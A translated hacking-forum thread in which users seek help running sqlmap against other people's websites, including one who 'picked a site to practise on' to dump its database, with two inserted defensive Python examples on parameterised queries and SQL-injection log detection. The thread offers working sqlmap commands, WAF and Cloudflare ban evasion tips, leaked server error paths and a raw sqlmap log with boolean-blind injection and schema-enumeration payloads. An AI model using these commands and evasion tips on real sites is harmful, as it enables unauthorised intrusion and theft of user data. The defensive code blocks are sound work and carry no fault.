I suspect a POST SQL injection on a site and want to check it with nmap. The POST method passes the following parameters:
Code:
1312312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id"
Code:
1231212
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id2"
Code:
3312312
Content-Type: text/plain; charset="utf-8"
Content-disposition: form-data; name="id3"
How do I tell nmap to try to exploit the id2 parameter?
Thanks, but with the request:
Code:
sqlmap\sqlmapproject-sqlmap-67f8c22\sqlmap.py -u "http://site.com/test.php" --method=POST --data="55" '-p=id' --dbs --random-agent
I get a demand to work over GET even though I need a POST request. How can this be overcome? How can
Code:
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
Found a blind SQLi in the headers with Acunetix; I'm trying to exploit it via sqlmap with the command
Code:
sqlmap.py -u "url" --headers="User-Agent:test*" --dbs
but the server bans me after about 5-6 requests (a 521 error from Cloud appears). I tried adding both time-sec and delay, it doesn't help. Are there any ways around the ban?
Try a random user-agent. You could also try going through a proxy. But most likely Cloud won't let it through.
сайт.ру/oc/?pg=%2527&pgpos=10&pid=%5c How do I make mamp see the hole? It's exploitable, but mamp doesn't see it, damn it; I've tried it in different ways, no luck.
Code:
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '\'; File: /var/www/html/us_production/affiliate/include/Affiliate/Scripts/Bl/ClickRegistrator.class.php; Line: 439
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT merchant_service_image_path FROM cms_merchant_service_details WHERE merchant_service_id = '
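The error text pasted above is what a string-concatenated query produces when a quote or backslash lands inside the literal, and the application then echoes the driver's message to the client. The following is an added example, not code from the thread or from the affected site: it rebuilds that pattern against an in-memory SQLite stand-in for the cms_cards table (the real schema is unknown, so the table and rows are constructed) and sets it beside the parameterised form plus a handler that never forwards database error text. SQLite does not treat backslash as a string escape the way MySQL does, so the demo input is a lone single quote, which breaks the literal on both engines.

```python
import sqlite3


# Constructed stand-in for the page's cms_cards table; the real schema is unknown.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_cards (cardId TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO cms_cards VALUES (?, ?)",
                     [("10", "card ten"), ("11", "card eleven")])
    return conn


def lookup_card_unsafe(conn, card_id):
    # The pattern behind the page's error message: the raw parameter is spliced into
    # the SQL text, so a stray quote (or, on MySQL, a backslash that escapes the closing
    # quote) leaves the statement unparseable and the driver raises.
    sql = "SELECT * FROM cms_cards WHERE cardId = '" + card_id + "'"
    return conn.execute(sql).fetchall()


def lookup_card_safe(conn, card_id):
    # The value is bound by the driver, separately from the SQL text; whatever bytes it
    # contains, it can only ever be compared against cardId.
    return conn.execute("SELECT * FROM cms_cards WHERE cardId = ?", (card_id,)).fetchall()


def handle_request(conn, card_id, lookup):
    # What an endpoint should return: rows, or a generic failure. The driver's message
    # (the "SQL error: You have an error in your SQL syntax ..." text on the page) belongs
    # in the server log only and is never sent back to the client.
    try:
        rows = lookup(conn, card_id)
    except sqlite3.Error:
        return {"status": "error", "body": "request could not be processed"}
    return {"status": "ok", "rows": rows}


if __name__ == "__main__":
    db = make_db()
    for value in ["10", "'", "10' OR '1'='1"]:
        print(repr(value))
        print("  concatenated:", handle_request(db, value, lookup_card_unsafe))
        print("  parameterised:", handle_request(db, value, lookup_card_safe))
```

Running it shows the three outcomes that matter to a defender: a normal id returns the same row either way, a quote makes the concatenated version fail (the client sees only the generic message) while the bound version simply returns no rows, and a tautology appended to the id returns every row through concatenation but nothing through the bound parameter.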
Hello, I decided to get into dumping databases, picked a site to practise on, scanned it with Acunetix and here is what came out.
Spoiler: Screenshot
I want to exploit the vulnerability with sqlmap; what do I put into sqlmap? Paste the link with the SQL injection? Here is what's in the link
Spoiler: Screenshot
Translated from Java, I got: "No places found in the matrix for query </strong>"
I'm thinking of writing in sqlmap:
Code:
sqlmap.py -u https://vulnerable_link --random-agent --level=5 --risk=3 --threads=3
Is that right or not, and do I need to add anything?
No, that's not right. sqlmap -u site --data='whatever is passed by the POST method goes here'. For that you need to click place_name->variant 1; all the required parameters will be there.
You have 2 mistakes
1. It's a POST method; you have to describe the vulnerable parameter that sits in the POST: --data="POST parameter here"
2. You didn't add --dbs
3. (tip) In the case of Acunetix, better check Blind SQL injection; sqlmap cracks that quickly (at least for me)
Can anyone advise how to deal with this? I'm trying to get the tables and it returns a 406 error.
Code:
sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:56:40

[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewall (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application Firewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Defense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web Application Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Firewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application Firewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisco Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Firewall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IBM)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Firewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Internet Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Firewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Firewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Akamai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application Firewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Firewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Alto Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Firewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application Security (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMode (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firewall'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Firewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Security (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporation)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewall (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Application Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (United Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Firewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Technologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firewall (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Firewall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Firewall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Firewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\artem\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the details on used protection please report it along with specific response to 'dev@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
    Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\output\url'
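The sqlmap output above is useful from the other side of the fence: the boolean-blind payloads (AND 3169=3169, 'pwZw'='pwZw, ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES ...)) and the double-encoded quote and stray backslash from the URL earlier in the thread are exactly the strings a WAF or log review keys on, and the burst of 406 responses from one client over a couple of seconds is what the protection here was reacting to. The following is an added example, not code from the thread or from sqlmap: a small detector that runs those signatures over constructed log events. The event format (pipe-separated fields) and the sample lines are invented for the demo; a real deployment would parse its own server or WAF log, and since ordinary access logs do not record POST bodies, the body column assumes a ModSecurity-style audit log.

```python
import re
from urllib.parse import unquote

# Constructed sample events: timestamp|client|method|path|body|status|user-agent.
# Payload shapes follow the thread; the hex schema name and addresses are made up.
SAMPLE_LOG = """\
2024-01-01T01:56:44Z|203.0.113.5|POST|/login.php|EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw|200|Mozilla/5.0
2024-01-01T01:56:44Z|203.0.113.5|POST|/login.php|EmailAddress=1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7465737464),1,1))>51 AND 'tjzX'='tjzX|406|Mozilla/5.0
2024-01-01T01:56:45Z|203.0.113.5|GET|/oc/?pg=%2527&pgpos=10&pid=%5c|-|500|sqlmap/1.2.4.2#dev (http://sqlmap.org)
2024-01-01T01:57:00Z|198.51.100.7|POST|/login.php|EmailAddress=alice@example.com&pw=hunter2|200|Mozilla/5.0
"""

# Each rule names a pattern visible in the thread's sqlmap output or URLs.
RULES = {
    "numeric_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),      # AND 3169=3169
    "quoted_tautology": re.compile(r"'([A-Za-z0-9]+)'\s*=\s*'\1", re.I),     # 'pwZw'='pwZw
    "char_inference": re.compile(r"\bORD\s*\(\s*MID\s*\(", re.I),            # ORD(MID(...
    "schema_enumeration": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
    "double_encoded_quote": re.compile(r"%27", re.I),   # %2527 still reads %27 after one decode
    "trailing_backslash": re.compile(r"\\(?:&|$)"),      # pid=%5c decodes to a lone backslash
}
SCANNER_UA = re.compile(r"sqlmap", re.I)   # sqlmap's default User-Agent names itself


def scan_log(text):
    """Return one finding per event that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, path, body, status, ua = line.split("|", 6)
        # Decode once, as the application would, then look for what remains.
        fields = [unquote(path), unquote(body)]
        hits = [name for name, rx in RULES.items() if any(rx.search(f) for f in fields)]
        if SCANNER_UA.search(ua):
            hits.append("scanner_ua")
        if hits:
            findings.append({"ts": ts, "client": client, "method": method,
                             "path": path, "status": int(status), "rules": hits})
    return findings


def per_client_counts(findings):
    """Flagged requests per client: several within seconds from one source is the
    burst pattern behind the 406/521 responses seen in the thread."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["client"], f["status"], f["rules"])
    print(per_client_counts(found))
```

Note which rules carry the weight: the poster uses --random-agent, so the User-Agent rule alone catches only default-configured runs, while the payload rules fire regardless of the agent string. The legitimate login on the last line produces no finding, which is the false-positive check worth keeping in any rule set like this.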